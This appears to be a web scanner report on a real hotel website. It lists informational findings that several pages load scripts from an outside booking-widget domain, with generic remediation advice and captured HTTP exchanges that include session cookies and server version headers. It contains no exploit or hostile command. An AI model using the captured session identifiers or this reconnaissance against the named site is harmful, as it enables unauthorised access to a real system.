/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.sterlinghotels.com/sterling/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232788636761250

Request

GET /sterling/index.aspx HTTP/1.1
Host: www.sterlinghotels.com
Proxy-Connection: keep-alive
Referer: http://www.sterlinghotels.com/sterling/index.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ttnddu45l5kxeq45ciduwmyu; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:27:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Ho
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232788636761250"></script>
...[SNIP]...

5.2. http://www.sterlinghotels.com/sterling/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232788232855000

Request

GET /sterling/index.aspx HTTP/1.1
Host: www.sterlinghotels.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ttnddu45l5kxeq45ciduwmyu

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33041
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:27:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Ho
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232788232855000"></script>
...[SNIP]...

5.3. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232697243792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 18:55:23 GMT
Content-Length: 289552

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232697243792500"></script>
...[SNIP]...

5.4. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069293636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:49 GMT
Content-Length: 63362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069293636250"></script>
...[SNIP]...

5.5. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067887386250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:28 GMT
Content-Length: 63439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067887386250"></script>
...[SNIP]...

5.6. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098676292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:17:47 GMT
Content-Length: 63425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098676292500"></script>
...[SNIP]...

5.7. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061243011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:23 GMT
Content-Length: 207170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061243011250"></script>
...[SNIP]...

5.8. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063352073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:18:54 GMT
Content-Length: 63663

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063352073750"></script>
...[SNIP]...

5.9. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065981292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:23:17 GMT
Content-Length: 63355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065981292500"></script>
...[SNIP]...

5.10. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232815520667500

Request

GET /sterling/special_offers/special_search_results.aspx HTTP/1.1
Host: www.sterlinghotels.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aribfn453jpkib553yjej455; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; acopendivids=special_offer,iprefer_reward; acgroupswithpersist=nada; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 22:12:31 GMT
Content-Length: 367063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232815520667500"></script>
...[SNIP]...

5.11. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061436448750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:43 GMT
Content-Length: 207211

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061436448750"></script>
...[SNIP]...

5.12. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068096917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:48 GMT
Content-Length: 63396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068096917500"></script>
...[SNIP]...

5.13. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064267230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:26 GMT
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064267230000"></script>
...[SNIP]...

5.14. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067410511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:41 GMT
Content-Length: 63450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067410511250"></script>
...[SNIP]...

5.15. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066755823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:24:35 GMT
